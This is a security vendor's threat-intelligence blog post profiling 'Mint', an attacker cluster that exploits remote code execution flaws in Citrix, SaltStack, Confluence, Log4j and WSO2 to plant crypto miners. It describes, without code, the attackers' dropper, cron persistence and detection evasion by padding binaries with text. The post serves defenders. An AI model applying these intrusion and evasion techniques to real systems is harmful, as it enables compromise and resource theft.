Threat Activity Cluster #1: Mint

This blog was originally published by Alert Logic on March 22, 2022.

Written by Josh Davies and Gareth Protheroe, Alert Logic.

Before diving into this first Ice Cream activity cluster, be sure to read the series introduction here.

Our first activity cluster is known as Mint.

This is a flavor of attackers who use remote code execution exploits (RCE) targeting Linux machines to upload crypto miners to vulnerable Linux systems. They are a very active actor, often first to the scene when a 0-day RCE emerges and tracking the group has given us early warning of these emerging exploits.

This blog is the culmination of years of work conducted by numerous individuals across global threat intelligence and SOC teams.

Mint Timeline

Mint’s actions had been observed previously, but Alert Logic first started paying close attention to them as a threat group at the beginning of January 2020 when they began a campaign exploiting CVE-2019-19781, a vulnerability discovered in the Citrix Application Delivery Controller (ADC) and Citrix Gateway. It allowed an attacker to remotely execute code without the need for any precursors, such as authentication into the system.

Unauthenticated RCEs are always the most serious of vulnerabilities, as it grants an attacker immediate control over a system in seconds, with no prerequisites required.

The vulnerability was on the radar of our researchers and threat hunters when it was announced on December 17, 2019. As a result, wideband telemetry signatures were deployed and flagged as a candidate for hunts. Like all wideband hunting telemetry, they captured an excessive amount of benign information as the net is cast wide. These signatures captured network data (full payload capture), so SOC threat experts (TSX) could sift through the requests and responses to identify the exploit. This creates a feedback loop that allows threat researchers to refine the telemetry signatures.

Initial reviews of these signatures did not yield any results. It was only after January 10, 2020, where a PoC was publicly available, that we started seeing customers targeted with the exploit. This a common pattern, as initially few know the specific method to successfully exploit a vulnerability, even though both attackers and defenders may be aware a vulnerability exists in a system. Once it is public, malicious actors use the PoC string and create derivatives to exploit and avoid detection or prevention.

The Mint Ice Cream flavor was first confirmed when a threat hunter identified a malware dropper with a naming convention related to the Citrix RCE and following a two-character “XX.sh” naming formula. It was then verified that the infected machine was a Citrix ADC. The dropper sought to kill any miners already present, setting up persistence mechanisms via Cron Jobs, before dropping an Executable and Linkable Format (ELF), to begin mining crypto currency (XMRIG miner).

We observed similar activity in April 2020 as part of the SaltStack campaign, although an interesting new tactic was discovered once access has been gained using the SaltStack RCE.

Mint TTP Evolution

Attackers evolve as they attempt to evade security controls and interestingly, in the SaltStack campaign, the ELF contained the whole of Shakespeare’s Hamlet amongst the code. While fun, the Shakespearean tragedy is likely to have served as a padder, meaning analytical tools would see the file as predominantly benign, as the majority was un-executable text. This meant that tools which flag/block based on the percentage of malicious content identified, would not be confident enough to block the file. Considering their goal, it is no wonder they chose Shakespeare’s longest play.

“Though this be madness, yet there is method in’t.”

– Hamlet Act 2, Scene 2, 193-206

The tactical evolution became part of the Mint strategy. It was observed again in October 2020 when the Oracle WebLogic RCE was discovered, and again in August 2021, exploiting the Atlassian Confluence flaw.

The activity that we have observed involves Russian IP addresses throughout, with IP addresses associated to former Soviet states involved in the installation phases. While this information is helpful for tracking and hunting activity related to the flavor, it is important to emphasize that this is not attribution to a nation, as IP addresses can be easily spoofed.

Their overall objective has been to install crypto miners onto vulnerable systems, hijacking their compute power to provide a steady stream of cryptocurrency to the attackers’ wallets. We have referred to the ELF file internally as a GO-LNG Miner, however it is widely known as Kinsing in the security community.

Mint continues to look for the latest RCE vulnerability to gain initial access. More recently, at the end of 2021 into 2022, this flavor was very active during the Log4j saga in an attempt to capitalize on the abundance of java-based applications likely to have been bundled with the vulnerable open source logging module. Mint were also observed exploiting CVE-2022-29464, the unauthenticated arbitrary file upload vulnerability present in WSO2 products.

Despite capitalizing on the latest exploit, hoping to catch vulnerable systems before the next patch cycle, and demonstrating the ability to adapt TTPs and infrastructure when necessary, elements of the subsequent techniques and actions are consistent. The same two configurations for mining have been consistently observed, alongside other common methods and indicators in the C2, installation and action on objective phases, allowing us to confidently cluster the activity under the flavor: Mint.

Our understanding and routine tracking of this threat activity has facilitated numerous detections and remediation plans for this group of customers.

All shared intelligence on Mint can be found at the bottom of this page. Happy hunting.

Continue with the rest of the series by clicking the links below:

• Cluster 2: Mint Sprinkles
• Cluster 3: Strawberry
• Cluster 4: Strawberry Sprinkles
• Cluster 5: Pistachio

About the Authors

Josh Davies is a Product Manager at Alert Logic by HelpSystems. Formerly a Security Analyst and Solutions Architect, Josh has extensive experience working with mid-market and enterprise organisations; conducting incident response and threat hunting activities as an analyst before working with organisations to identify appropriate security solutions for challenges across cloud, on-premises and hybrid environments.

Gareth Protheroe is a Sans certified (GCTI) senior security analyst at Alert Logic by HelpSystems. Gareth has a background in chemical science and currently spearheads Alert Logic’s threat hunting activities conducted by the SOC and threat intelligence teams.